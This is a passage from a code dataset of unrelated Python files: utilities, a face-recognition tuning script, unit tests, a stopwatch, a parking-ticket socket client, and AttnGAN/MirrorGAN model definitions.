(MemoryUnit): Original unit\r\n\r\n Returns:\r\n [float, MemoryUnit]: target value and unit\r\n \"\"\"\r\n try:\r\n num = float(num)\r\n if num == 0:\r\n return 0, unit\r\n\r\n index = unit.value\r\n while index > maxUnit.value:\r\n newNum = num / 1024\r\n if newNum < 1:\r\n break\r\n num = newNum\r\n index -= 1\r\n\r\n return num, MemoryUnit(index)\r\n except ValueError:\r\n return 0, MemoryUnit.BYTE\r\n\r\n\r\ndef getMemoryUnitString(num: float, unit: MemoryUnit) -> str:\r\n \"\"\"Convert the unit to string, eg: num(2653)unit(MB) -> '2.59 GB'\r\n\r\n Args:\r\n num (float): value\r\n unit (MemoryUnit): Original unit\r\n\r\n Returns:\r\n [string]: target string, keep two decimal places\r\n \"\"\"\r\n value, newUnit = convertMemoryUnitAuto(num, unit, MemoryUnit.GB)\r\n string = str(round(value, 2)) + ' ' + newUnit.name\r\n return string\r\n","sub_path":"aigpy/convertHelper.py","file_name":"convertHelper.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"126836256","text":"from __future__ import print_function\nimport matplotlib.pyplot as plt\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.datasets import fetch_lfw_people\nfrom sklearn.metrics import accuracy_score, log_loss\nfrom classifiers import *\nfrom model import *\nfrom config import *\nimport numpy as np\nfrom preprocessor import Preprocessor\nfrom sklearn.preprocessing import StandardScaler\n\nDELTA_ERROR = 0.01\n\ndef has_converged(y):\n return Math.abs(y[-1] - y[-2]) <= DELTA_ERROR and Math.abs(y[-2] - y[-3]) <= DELTA_ERROR\n\n\ndef test_case(param, values, n_classes, x_train, y_train, x_test, y_test, data_name, other_args={}):\n y1 = []\n y2 = []\n losses = []\n accuracies = []\n times = []\n best_acc = 0\n best_val = None\n\n try:\n for val in values:\n accuracy, loss, time = test_single_var(param, val, n_classes, x_train, y_train, x_test, y_test, other_args)\n print(\"Param: %s, value: %s, accuracy: %s, loss: %s\" % (param, val, accuracy, loss))\n accuracies.append(accuracy)\n losses.append(loss)\n times.append(time)\n if accuracy > best_acc:\n best_val = val\n best_acc = accuracy\n y1.append(accuracy)\n y2.append(loss)\n except KeyboardInterrupt:\n pass\n\n x = np.array(range(len(y1)))\n\n stats = {'n_samples' : x_train.shape[0],\n 'n_classes' : n_classes,\n 'n_test' : x_test.shape[0],\n 'param' : param,\n 'values' : values,\n 'accuracies' : accuracies,\n 'losses' : losses,\n 'tain_times' : times,\n 'best_acc' : best_acc,\n 'best_val' : best_val,\n 'other_args' : other_args}\n\n save_test_stats(stats, data_name)\n max_y2 = float(max(y2))\n y2 = list(map(lambda x: x/max_y2, y2))\n print(\"Best %s: %s\\nAccuracy %s\" % (param, best_val, best_acc))\n save_graph(x, y1, y2, param, values, data_name)\n\n\ndef test_case(param, values, n_classes, x_train, y_train, x_test, y_test, data_name, other_args={}):\n y1 = []\n y2 = []\n losses = []\n accuracies = []\n times = []\n best_acc = 0\n best_val = None\n\n try:\n for val in values:\n accuracy, loss, time = test_single_var(param, val, n_classes, x_train, y_train, x_test, y_test, other_args)\n print(\"Param: %s, value: %s, accuracy: %s, loss: %s\" % (param, val, accuracy, loss))\n accuracies.append(accuracy)\n losses.append(loss)\n times.append(time)\n if accuracy > best_acc:\n best_val = val\n best_acc = accuracy\n y1.append(accuracy)\n y2.append(loss)\n except KeyboardInterrupt:\n pass\n\n x = np.array(range(len(y1)))\n\n stats = {'n_samples' : x_train.shape[0],\n 'n_classes' : n_classes,\n 'n_test' : x_test.shape[0],\n 'param' : param,\n 'values' : values,\n 'accuracies' : accuracies,\n 'losses' : losses,\n 'tain_times' : times,\n 'best_acc' : best_acc,\n 'best_val' : best_val,\n 'other_args' : other_args}\n\n save_test_stats(stats, data_name)\n max_y2 = float(max(y2))\n y2 = list(map(lambda x: x/max_y2, y2))\n save_graph(x, y1, y2, param, values, data_name)\n print(\"Best %s: %s\\nAccuracy %s\" % (param, best_val, best_acc))\n\n\ndef test_no_match(x_train, y_train, x_test, param, values, data_name, other_args = {}):\n accs = []\n best_acc = 0\n best_val = None\n for val in values:\n all_args = {param: val}\n all_args.update(other_args)\n acc = _test_no_match(x_train, y_train, x_test, all_args)\n print(\"Param: %s, value: %s, accuracy: %s\" % (param, val, acc))\n accs.append(acc)\n if acc > best_acc:\n best_acc = acc\n best_val = val\n\n y1 = np.array(accs)\n x = np.array(range(len(y1)))\n y2 = [1-a for a in accs]\n print(\"Best %s: %s\\nAccuracy %s\" % (param, best_val, best_acc))\n save_graph(x, y1, y2, param, values, data_name)\ndef _test_no_match(x_train, y_train, x_test, args):\n mlp = train_model(x_train, y_train, args)\n ids = [verify_img(mlp,x) for x in x_test]\n correct = ids.count(\"NO_MATCH\")\n accuracy = correct/float(len(ids))\n return accuracy\n\n\ndef save_graph(x, y1, y2, param, values, data_name):\n xTicks = [str(values[i]) for i in range(len(x))]\n fig, ax = plt.subplots()\n plt.xticks(x, xTicks)\n line1, = ax.plot(x, y1, '-', label='Accuracy')\n plt.xticks(x, xTicks)\n line2, = ax.plot(x, y2, '-', label='Loss')\n ax.legend(loc = 'lower right')\n ax.set_xlabel(param)\n fig.autofmt_xdate(rotation=80)\n #plt.show()\n plt.savefig(\"data/graphs/\" + \"%s.png\" % (data_name))\n\n\ndef test_single_var(test_arg, value, n_classes, x_train, y_train, x_test, y_test, other_args = {}):\n all_args = {test_arg : value}\n all_args.update(other_args)\n mlp = MLPClassifier(**all_args)\n t0 = time()\n mlp.fit(x_train, y_train)\n train_time = (time() - t0)\n y_pred = mlp.predict(x_test)\n y_proba = mlp.predict_proba(x_test)\n accuracy = accuracy_score(y_test, y_pred)\n loss = log_loss(y_test, y_proba, labels=[i for i in range(n_classes)])\n return accuracy, loss, train_time\n\n\ndef save_test_stats(stats, data_name):\n with open(\"./data/stats/\" + \"%s\" % data_name, 'a') as f:\n print(\"##TESTCASE##\", file=f)\n for k,v in stats.items():\n print(\"%s: %s\" % (k,v), file=f)\n\n\ndef train_model(x_train, y_train, args):\n mlp = MLPClassifier(**args)\n mlp.fit(x_train, y_train)\n return mlp\n\n\ndef verify_img(clf, img, label=None, target_names=None):\n #just to get rid of unsuppressable stupid sklearn warnings\n img = img.reshape(1, -1)\n y_prob = clf.predict_proba(img)\n y_pred = clf.predict(img)\n if label and target_names:\n print(\"Predicted: %s\\n Confidence: %s\\n Actually: %s\" % (target_names[y_pred], y_prob[0][y_pred], label))\n if y_prob.max() > 0.85:\n return \"MATCH\"\n else:\n return \"NO_MATCH\"\n\n\np = Preprocessor()\nX_train, X_test, y_train, y_test, target_names = p.get_data()\nprint(\"LOADED DATA\")\nn_classes = target_names.shape[0]\n\nfrom sklearn.preprocessing import StandardScaler\nscaler = StandardScaler()\n\npca = PCA(n_components=PCA_N_COMPONENTS, whiten=True, svd_solver='randomized').fit(X_train)\nn_components = min(PCA_N_COMPONENTS, pca.components_.shape[0])\neigenfaces = pca.components_.reshape((n_components, processed_height, processed_width))\nx_train = pca.transform(X_train)\nx_test = pca.transform(X_test)\nscaler = StandardScaler()\nscaler.fit(x_train)\nx_train = scaler.transform(x_train)\nx_test = scaler.transform(x_test)\n\n## This is grabbing img/target_label_name for single person\nnew_person_imgs, target_labels = p.load_test_data(\"data/Nikola\")\nnp_imgs = pca.transform(new_person_imgs)\nnp_imgs = scaler.transform(np_imgs)\n\n#test_no_match(x_train, y_train, np_imgs, \"hidden_layer_sizes\", [(20,i) for i in range (1,30,2)], \"small_(20,1-30)\", {'alpha':1.1, 'beta_1':0.9, 'learning_rate':'constant', 'max_iter':3000, 'batch_size': 80})\n#test_no_match(x_train, y_train, np_imgs, \"hidden_layer_sizes\", [(i,2) for i in range (3,60,4)], \"small_(3-60,2)\", {'alpha':1.1, 'beta_1':0.9, 'learning_rate':'constant', 'max_iter':3000, 'batch_size': 80}) #(7,2), (11,2), (47,2) all 100%\ntest_no_match(x_train, y_train, np_imgs, \"hidden_layer_sizes\", [(i,1) for i in range (1,30)], \"small_(1-30,1)\", {'alpha':1.1, 'beta_1':0.9, 'learning_rate':'constant', 'max_iter':3000, 'batch_size': 80})\n\n\n# Drop into an ipython session to experiment\n#from IPython import embed\n#embed()\n\n#just to keep template for quick test.. dont be upset\n#test_case(\"hidden_layer_sizes\", [(20,i) for i in range(3,200,5)], n_classes, x_train, y_train, x_test, y_test, \"hi_iter_batch_(20,3-200)\", other_args = {'alpha': 1.1, 'beta_1': 0.9, 'learning_rate': 'constant', 'max_iter' : 3000, 'batch_size' : 3000})\n","sub_path":"src/data_collect.py","file_name":"data_collect.py","file_ext":"py","file_size_in_byte":8057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"297909271","text":"import unittest\nimport temperature_utils\n\n\nclass TemperatureUtilsTest(unittest.TestCase):\n\n def test_convert_to_celsius(self):\n test_cases = [\n (32, 0),\n (68, 20),\n (100, 37.78),\n (104, 40)\n ]\n for temp_in, expected in test_cases:\n with self.subTest(f\"{temp_in} -> {expected}\"):\n self.assertEqual(expected, temperature_utils.convert_to_celsius(temp_in))\n\n def test_convert_to_fahrenheit(self):\n test_cases = [\n (-17.7778, 0),\n (0, 32),\n (100, 212)\n ]\n for temp_in, expected in test_cases:\n with self.subTest(f\"{temp_in} -> {expected}\"):\n self.assertEqual(expected, temperature_utils.convert_to_fahrenheit(temp_in))\n\n def test_temperature_tuple(self):\n temps_input = (32, 68, 100, 104)\n expected = ((32, 0.0), (68, 20.0), (100, 37.78), (104, 40.0))\n actual = temperature_utils.temperature_tuple(temps_input, \"f\")\n self.assertEqual(expected, actual)\n\n def test2_temperature_tuple(self):\n temps_input = (-17.7778, 0, 100)\n expected = ((-17.7778, 0.0), (0, 32.0), (100, 212.0))\n actual = temperature_utils.temperature_tuple(temps_input, \"c\")\n self.assertEqual(expected, actual)\n\n def test3_temperature_tuple(self):\n temps_input = (1, 2, 3)\n self.assertEqual(tuple(), temperature_utils.temperature_tuple(temps_input, \"a\"))\n","sub_path":"part6/test_temperature_utils.py","file_name":"test_temperature_utils.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"23361226","text":"import matplotlib.pyplot as plt\nfrom string import ascii_uppercase\n\ndef countSpecific(_path, _letter):\n _letter = _letter.strip().upper()\n file = open(_path, 'rb')\n text = str(file.read())\n return text.count(_letter) + text.count(_letter.lower())\n\ndef countAll(_path):\n file = open(_path, \"rb\")\n text = str(file.read())\n letters = dict.fromkeys(ascii_uppercase, 0)\n for char in text:\n if char.isalpha():\n letters[char.upper()]+=1\n\n return letters\n\npath = input(\"What file would you like to use? (text.txt) \")\nD = countAll(\"src\\\\Other\\\\\" + path)\n# D = D | countAll(\"src\\\\Other\\\\\" + path)\n# S = {k: v for k, v in sorted(D.items(), key=lambda item: item[1])}\nprint(D)\nplt.bar(range(len(D)), list(D.values()), align='center')\nplt.xticks(range(len(D)), list(D.keys()))\n\n\nplt.show()","sub_path":"src/Other/LetterFrequency.py","file_name":"LetterFrequency.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"472993191","text":"import requests\nimport json,os,sys,time\nfrom datetime import datetime\nfrom Pila.Pila import Pila\n\n\nfrom urllib.request import urlopen\n\n\n\nruta = os.path.join(os.path.dirname(os.path.abspath(__file__)))\nruta = ruta + \"/\"\ndef obtenerUsuario(ruta):\n\tlista = ruta.split(\"/\")\n\treturn \"/\"+lista[1]+\"/\"+lista[2]+\"/\"\t\nrutaUsuario = obtenerUsuario(ruta)\nprint(rutaUsuario)\n\n\n\nraiz = os.path.join(os.path.dirname(os.path.abspath(__file__)),\"..\")\nsys.path.append(raiz)\n\nimport Conexiones.cliente as Servidor\n\nclass Conexiones:\n\t\"\"\"Clase utilizada para guardar los datos \n\ten caso un intento de conexion fallido\n\t\"\"\"\n\n\tdef __init__(self):\n\t\tself.items = []\n\t\tcola = Pila()\n\t\tself.obtenerConfiguracion()\n\n\tdef activo(self):\n\t\tconexionServ=1\n\t\ttry:\n\t\t\tconexionServ=os.system(\"sudo ping -c 1 192.168.1.129\")\n\t\t\tif conexionServ:\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\treturn True\n\t\texcept: \n\t\t\treturn conexionServ\n\t\n\tdef obtenerConfiguracion(self):\n\t\t#global equipo, sucursal, tipo\n\t\ttry:\n\t\t\tinfile = open(rutaUsuario+\"eum.conf\", 'r')\n\t\t\tc=infile.readline()\n\t\t\tarr=c.split(',')\n\t\t\tself.__equipo=int(arr[0])\n\t\t\tself.__sucursal=int(arr[1])\n\t\t\tself.__tipo=int(arr[2])\n\t\t\tinfile.close()\n\t\texcept:\n\t\t\tself.__equipo=1\n\t\t\tself.__sucursal=1\n\t\t\tself.__tipo=0\n\t\t\tinfile = open(rutaUsuario+\"eum.conf\", \"w\")\n\t\t\tinfile. write(str(self.__equipo)+\",\"+str(self.__sucursal)+\",\"+str(self.__tipo))\n\t\t\tinfile. close()\n\t\tprint(\"equipo,sucursal,tipo \",self.__equipo,self.__sucursal,self.__tipo)\n\n\t\t\n\t\t\n\t\n\tdef servidorActivo(self):\n\t\ttimestamp=datetime.now()\t\t\n\t\tmensaje=str(\"2\")+\",\"+str(\"0\")+\",\"+str(21)\n\t\tresultado=Servidor.configSocket(\"log\", mensaje)\n\t\tif(resultado==-1):\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\n\tdef pollConexion(self,tipo):\n\t\ttimestamp=datetime.now()\t\n\t\tprint(\"equipo.......\",self.__equipo,self.__tipo)\t\n\t\tmensaje=str(\"2\")+\",\"+str(tipo)+\",\"+str(self.__tipo)+str(self.__equipo)\n\t\tresultado=Servidor.configSocket(\"log\", mensaje)\n\t\tif(resultado==-1):\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\tdef logPrendido(self):\n\t\tmensaje=str(\"2\")+\",\"+str(\"1\")+\",\"+str(self.__tipo)+str(self.__equipo)\n\t\tresultado=Servidor.configSocket(\"log\", mensaje)\n\t\tif(resultado==-1):\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\tdef obtenerLogs(self):\n\t\tmensaje=str(\"2\")+\",\"+str(\"4\")+\",\"+str(21)\n\t\tlogs=Servidor.configSocket(\"log\", mensaje)\n\t\tif(logs==-1):\n\t\t\treturn False\n\t\telse:\n\t\t\tlogsResult = []\n\t\t\tlogs = str(logs.decode('utf-8'))\n\t\t\ttmp = len(logs)\n\t\t\tlogs = logs[:tmp -1]\n\t\t\tlogs = logs.replace(\"[\",\" \") \n\t\t\tlogs = logs.split(\",\")\n\t \t#logs = logs[3]\n\t \t#logs = logs.split(',')\n\t #for log in logs:\n\t # print(\"Nodo: \"+str(log[3])+\" \"+\"Fecha:\"+str(log[1]))\n\t\t\tfor log in logs:\n\t\t\t\ttmp = len(log)\n\t\t\t\tlog = log[2:tmp -1]\n\t\t\t\tlogsResult.append(log)\n\t\t\treturn logsResult\n\t\t\t\n\t\t\t\n\tdef buscarTicket(self,mensaje):\n\t\ttry:\n\t\t\tresultado=Servidor.configSocket(\"informacion boleto\", mensaje)\n\t\t\tif(resultado == \"boleto no localizado\"):\n\t\t\t\tprint(\"Registrando boleto no localizado...\")\n\t\t\telse:\n\t\t\t\tprint(\"boleto no localizado, esperando su registro...\")\n\t\t\treturn resultado\n\t\texcept:\n\t\t\tprint(\"Error en la busqueda del ticket\")\n\t\t\treturn -1\n\t\t\t\n\t\t\t\n\tdef registrarPago(self,mensaje):\n\t\ttry:\n\t\t\tServidor.configSocket(\"pago boleto\", mensaje)\n\t\t\tif(resultado == \"boleto no localizado\"):\n\t\t\t\tprint(\"Registrando boleto no localizado...\")\n\t\t\telse:\n\t\t\t\tprint(\"boleto no localizado, esperando su registro...\")\n\t\t\treturn resultado\n\t\texcept:\n\t\t\tprint(\"Error en el registro del pago\")\n\t\t\treturn -1\n\t\t\t\n\tdef encolarPago(self,mensaje):\n\t\ttry:\n\t\t\tprint(cola.estaVacia())\n\t\texcept:\n\t\t\tprint(\"Error al encolar el pago\")\n\t\t\treturn -1\n\n\n\tdef estaVacia(self):\n\t\treturn self.items == []\n\n\tdef incluir(self, item):\n\t\tself.items.append(item)\n\n\tdef extraer(self):\n\t\treturn self.items.pop()\n\n\tdef inspeccionar(self):\n\t\treturn self.items[len(self.items)-1]\n\n\tdef tamano(self):\n\t\treturn len(self.items)\n","sub_path":"app/Conexiones/Conexiones.py","file_name":"Conexiones.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"307290059","text":"#!python3\n#stopwatch.py-A simple stopwatch application\nimport time\n\n\nprint('Press ENTER to begin.Then press ENTER to \"click\" the stopwatchPress Ctrl-C to quit.')\ninput()\nprint('Started')\nstart=time.time()\nlasttime=start\nlapNum=1\ntry:\n\twhile 1:\n\t\tinput()\n\t\tlapTime=round(time.time()-lasttime,2)\n\t\ttotal=round(time.time()-start,2)\n\t\tprint('Lap #%s:%s (%s)' %(lapNum,str(total).rjust(5),str(lapTime).rjust(5)))\n\t\tlapNum+=1\n\t\tlasttime=time.time()\nexcept KeyboardInterrupt:\n\t#Handling Ctrl-C exception\n\tprint('\\nDone')\n","sub_path":"chap15/stopwatch.py","file_name":"stopwatch.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"246104877","text":"# File: models.py\n# ---------------\n# File containing definitions for all models and architectures\n# used by AttnGAN and MirrorGAN. The implementations of the\n# models were influenced by https://github.com/taoxugit/AttnGAN.\n\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import models\nimport torch.utils.model_zoo as model_zoo\nimport torch.nn.functional as F\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nimport os\n\nimport constants\n\n# General utility functions for dealing with models\ndef initialize_models(args):\n '''\n Initialize the models required for the particular experiment\n '''\n # Initialize the DAMSM components\n if args.pretrain and not args.mirrorgan:\n return initialize_damsm_models(args)\n elif args.pretrain and args.mirrorgan:\n return initialize_caption_models(args)\n elif not args.mirrorgan:\n return initialize_attngan_models(args)\n else:\n return initialize_mirrorgan_models(args)\n\ndef initialize_damsm_models(args):\n '''\n Initializes the models for DAMSM.\n '''\n # Initialize the DAMSM components\n text_encoder = load_model(args, args.model_path, TextEncoder, 'damsm')\n image_encoder = load_model(args, args.model_path, ImageEncoder, 'damsm')\n return text_encoder, image_encoder\n\ndef initialize_caption_models(args):\n '''\n Initializes the models for STREAM.\n '''\n image_encoder = load_model(args, args.model_path, ImageCaptioningImageEncoder,\n \"caption\")\n captioner = load_model(args, args.model_path, ImageCaptioningLSTM,\n \"caption\")\n return image_encoder, captioner\n\ndef initialize_attngan_models(args):\n '''\n Initializes the models for AttnGAN.\n '''\n # Initialize the DAMSM components\n text_encoder = load_model(args, args.damsm_path, TextEncoder, 'damsm')\n image_encoder = load_model(args, args.damsm_path, ImageEncoder, 'damsm')\n turn_off_requires_grad([text_encoder, image_encoder])\n\n # Initialize the generators and discriminators\n generator_complex = load_model(args, args.model_path, GeneratorComplex, 'main')\n discriminators = []\n for i in range(3):\n discriminators.append(load_model(args, args.model_path, Discriminator, 'main', i))\n return text_encoder, image_encoder, generator_complex, discriminators \n\ndef initialize_mirrorgan_models(args):\n '''\n Initialize the models for MirrorGAN\n '''\n # Initialize the pretrained components\n text_encoder = load_model(args, args.damsm_path, TextEncoder, 'damsm')\n image_encoder = load_model(args, args.caption_path, ImageCaptioningImageEncoder,\n 'caption')\n captioner = load_model(args, args.caption_path, ImageCaptioningLSTM,\n 'caption')\n turn_off_requires_grad([text_encoder, image_encoder, captioner])\n specific_component = [image_encoder, captioner]\n\n # Initialize the generators and discriminators\n generator_complex = load_model(args, args.model_path, GeneratorComplex, 'main')\n discriminators = []\n for i in range(3):\n discriminators.append(load_model(args, args.model_path, Discriminator, 'main', i))\n return text_encoder, specific_component, generator_complex, discriminators\n\ndef initialize_inception_network(args):\n '''\n Initializes the inception network for the calculation of inception scores\n '''\n model = InceptionNetwork().to(args.device)\n epoch = args.inception_load_epoch\n \n if epoch != -1:\n extension = \"{}_model_epoch={}.pth\".format(model.name, epoch)\n path = os.path.join(args.inception_model_path, extension)\n model.load_state_dict(torch.load(path))\n\n return model\n\ndef turn_off_requires_grad(models):\n '''\n Sets requires grad to false for the input models\n '''\n for model in models:\n for param in model.parameters():\n param.requires_grad = False\n\ndef load_model(args, model_dir, model_class, method_section, disc_num=-1):\n # Load the model\n if disc_num == -1:\n model = model_class(args).to(args.device)\n else:\n model = model_class(args, disc_num).to(args.device)\n\n # Decide whether to load from previous epochs\n epoch = get_epoch(args, method_section)\n\n if epoch == -1 and method_section == 'main':\n model.apply(weight_init)\n elif epoch != -1:\n extension = \"{}_model_epoch={}.pth\".format(model.name, epoch)\n path = os.path.join(model_dir, extension)\n model.load_state_dict(torch.load(path))\n\n return model\n\ndef get_epoch(args, method_section):\n if method_section == \"main\":\n return args.load_epoch\n elif method_section == \"damsm\":\n return args.damsm_load_epoch\n else:\n return args.caption_load_epoch\n\ndef weight_init(m):\n if isinstance(m, nn.Linear) or isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight.data)\n nn.init.constant_(m.bias.data, 0) # May be problematic\n \ndef get_damsm_params(args, model):\n '''\n Gets the parameters to be used for DAMSM optimization\n '''\n # Get the DAMSM optimizer\n text_encoder, image_encoder = model\n parameters = list(text_encoder.parameters())\n for param in image_encoder.parameters():\n if param.requires_grad:\n parameters.append(param)\n return parameters\n\ndef get_caption_params(args, model):\n '''\n Gets the parameters to be used for STREAM optimization\n '''\n image_encoder, captioner = model\n parameters = list(captioner.parameters()) + list(image_encoder.projection.parameters())\n return parameters\n\ndef initialize_damsm_optimizer(args, model):\n '''\n Initializes the optimizers for training damsm module\n '''\n # Get the DAMSM optimizer\n text_encoder, image_encoder = model\n parameters = list(text_encoder.parameters())\n for param in image_encoder.parameters():\n if param.requires_grad:\n parameters.append(param)\n optimizer = optim.Adam(parameters, lr=args.damsm_lr, betas=(0.5, 0.999))\n\n # Load from checkpoint if specified\n if args.damsm_load_epoch != -1:\n extension = \"damsm_optim_epoch={}.pth\".format(args.damsm_load_epoch)\n path = os.path.join(args.model_path, extension)\n optimizer.load_state_dict(torch.load(path))\n\n return optimizer\n\ndef initialize_main_optimizer(args, model):\n '''\n Initializes the optimizers for training the main modules.\n '''\n # Get the optimizers themselves\n _, _, generator, discriminators = model\n generator_optimizer = load_main_optim(args, generator, args.gen_lr)\n discriminator_optimizers = []\n for discriminator in discriminators:\n discriminator_optimizers.append(load_main_optim(args, discriminator,\n args.disc_lr))\n return generator_optimizer, discriminator_optimizers\n\ndef load_main_optim(args, model, lr):\n '''\n Initializes and potentially loads from checkpoints an optimizer\n '''\n # Initialize optimizer\n optimizer = optim.Adam(model.parameters(), lr=lr, betas=(0.5, 0.999))\n\n # Load from checkpoint if needed\n if args.load_epoch != -1:\n extension = \"{}_optim_epoch={}.pth\".format(model.name, args.load_epoch)\n path = os.path.join(args.model_path, extension)\n optimizer.load_state_dict(torch.load(path))\n\n return optimizer\n\ndef save_model(args, model, epoch):\n '''\n Saves a model to the folder specified in args\n '''\n extension = \"{}_model_epoch={}.pth\".format(model.name, epoch)\n path = os.path.join(args.model_path, extension)\n torch.save(model.state_dict(), path)\n\ndef save_optimizer(args, model, optimizer, epoch):\n '''\n Saves a model to the folder specified in args\n '''\n extension = \"{}_optim_epoch={}.pth\".format(model.name, epoch)\n path = os.path.join(args.model_path, extension)\n torch.save(optimizer.state_dict(), path)\n\n\ndef save_main_state(args, model, optimizers, epoch):\n '''\n Saves the current state of the main module\n '''\n _, _, generator, discs = model\n gen_opt, disc_opts = optimizers\n\n save_model(args, generator, epoch)\n save_optimizer(args, generator, gen_opt, epoch)\n for index, disc in enumerate(discs):\n save_model(args, disc, epoch)\n save_optimizer(args, disc, disc_opts[index], epoch)\n\ndef save_damsm_state(args, model, epoch):\n '''\n Saves the current state of the DAMSM modules\n '''\n text_encoder, image_encoder = model\n\n # Save the models\n save_model(args, text_encoder, epoch)\n save_model(args, image_encoder, epoch)\n\ndef save_caption_state(args, model, epoch):\n '''\n Saves the current state of the STREAM module\n '''\n image_encoder, captioner = model\n\n # Save the models\n save_model(args, image_encoder, epoch)\n save_model(args, captioner, epoch)\n\n# Utility functions for recurring blocks\ndef conv1x1(in_channels, num_filter, bias=True):\n '''\n Simple 1x1 convolution layer\n '''\n return nn.Conv2d(in_channels, num_filter, 1, bias=bias)\n\ndef conv3x3(in_channels, num_filter, bias=True):\n '''\n Simple 3x3 convolution layer that preserves dimensions\n (H, W).\n '''\n return nn.Conv2d(in_channels, num_filter, 3, padding=1,\n bias=bias)\n\nclass GLU(nn.Module):\n def __init__(self):\n super(GLU, self).__init__()\n\n def forward(self, x):\n nc = int(x.shape[1] / 2)\n return x[:, :nc] * torch.sigmoid(x[:, nc:]) \n\ndef upBlock(in_channels, num_filter):\n '''\n Upsclaes the input tensor by a factor of two and then\n applies a 3x3 dimension preserving convolutional layer\n '''\n return nn.Sequential(\n nn.Upsample(scale_factor=2, mode='nearest'),\n conv3x3(in_channels, num_filter * 2),\n nn.BatchNorm2d(num_filter * 2),\n GLU())\n\ndef leakyReLUBlock(in_channels, num_filter, kernel_size=3, \n stride=1, padding=1, bias=True):\n return nn.Sequential(\n nn.Conv2d(in_channels, num_filter, kernel_size,\n stride=stride, padding=padding, bias=bias),\n nn.BatchNorm2d(num_filter),\n nn.LeakyReLU(0.2, inplace=True))\n\nclass ResidualBlock(nn.Module):\n '''\n Implementation of the residual blocks to be used in the\n deeper generator modules.\n '''\n \n def __init__(self, in_channels):\n super(ResidualBlock, self).__init__()\n \n self.res_block = nn.Sequential(\n conv3x3(in_channels, in_channels * 2),\n nn.BatchNorm2d(in_channels * 2),\n GLU(),\n conv3x3(in_channels, in_channels),\n nn.BatchNorm2d(in_channels))\n\n def forward(self, x):\n return x + self.res_block(x)\n\nclass MyDataParallel(nn.DataParallel):\n def __getattr__(self, name):\n return getattr(self.module, name)\n\n# Model architectures\n\n# DAMSM Components: The Text and Image Encoders\nclass TextEncoder(nn.Module):\n '''\n The text encoder used in order to extract sentence encodings\n and word encodings from a caption. The word encodings correspond\n to the last hidden layer features for each word, while the sentence\n encoding corresponds to the very last hidden layer activation of the\n last forward pass through the LSTM.\n '''\n \n def __init__(self, args):\n super(TextEncoder, self).__init__()\n self.name = \"text_encoder\"\n\n # Architecture hyperparameters\n self.vocab_size = args.vocab_size\n self.embed_size = args.embed_size\n self.prob = args.dropout_prob\n self.num_layers = args.num_encoder_layers\n self.hidden_size = int(args.encoding_size / 2)\n \n # Initialize parameters\n self.encoder = nn.Embedding(self.vocab_size, self.embed_size)\n self.encoder.weight.data.uniform_(-args.weight_range, args.weight_range)\n self.dropout = nn.Dropout(self.prob)\n self.lstm = nn.LSTM(self.embed_size, self.hidden_size, self.num_layers,\n batch_first=True, dropout=self.prob, bidirectional=True)\n\n def forward(self, captions, cap_lens):\n embedding = self.dropout(self.encoder(captions))\n embedding = pack_padded_sequence(embedding, cap_lens, batch_first=True)\n\n word_embedding, hiddens = self.lstm(embedding)\n\n # Get word embedding in desired ordering (DxT)\n word_embedding = pad_packed_sequence(word_embedding, batch_first=True)[0]\n word_embedding = word_embedding.transpose(1, 2)\n\n # Get the sentence embedding in desired ordering (D)\n hidden, cell = hiddens\n hidden = hidden.view(self.num_layers, 2, -1, self.hidden_size)\n sentence_embedding = hidden[-1].transpose(0, 1).contiguous().view(-1, 2 * self.hidden_size)\n\n return word_embedding, sentence_embedding\n\nclass ImageEncoder(nn.Module):\n '''\n The pretrained Inception-v3 model used to encode images for DAMSM\n loss computation. \n '''\n \n def __init__(self, args):\n super(ImageEncoder, self).__init__()\n self.name = \"image_encoder\"\n self.encoding_size = args.encoding_size\n \n # Load pretrained Inception-v3 model from torchivision\n model = models.inception_v3()\n url = 'https://download.pytorch.org/models/inception_v3_google-1a9a5a14.pth'\n model.load_state_dict(model_zoo.load_url(url))\n for param in model.parameters():\n param.requires_grad = False\n\n # Initialize model parameters\n self.Conv2d_1a_3x3 = model.Conv2d_1a_3x3\n self.Conv2d_2a_3x3 = model.Conv2d_2a_3x3\n self.Conv2d_2b_3x3 = model.Conv2d_2b_3x3\n self.Conv2d_3b_1x1 = model.Conv2d_3b_1x1\n self.Conv2d_4a_3x3 = model.Conv2d_4a_3x3\n self.Mixed_5b = model.Mixed_5b\n self.Mixed_5c = model.Mixed_5c\n self.Mixed_5d = model.Mixed_5d\n self.Mixed_6a = model.Mixed_6a\n self.Mixed_6b = model.Mixed_6b\n self.Mixed_6c = model.Mixed_6c\n self.Mixed_6d = model.Mixed_6d\n self.Mixed_6e = model.Mixed_6e\n self.Mixed_7a = model.Mixed_7a\n self.Mixed_7b = model.Mixed_7b\n self.Mixed_7c = model.Mixed_7c\n\n self.conv_embed = conv1x1(768, self.encoding_size)\n self.conv_embed.weight.data.uniform_(-args.weight_range, args.weight_range)\n self.linear_embed = nn.Linear(2048, self.encoding_size)\n self.linear_embed.weight.data.uniform_(-args.weight_range, args.weight_range)\n \n def forward(self, x):\n # Extract Inception-v3 features\n x = nn.Upsample(size=(299, 299), mode='bilinear', align_corners=True)(x)\n x = self.Conv2d_1a_3x3(x)\n x = self.Conv2d_2a_3x3(x)\n x = self.Conv2d_2b_3x3(x)\n x = F.max_pool2d(x, kernel_size=3, stride=2)\n 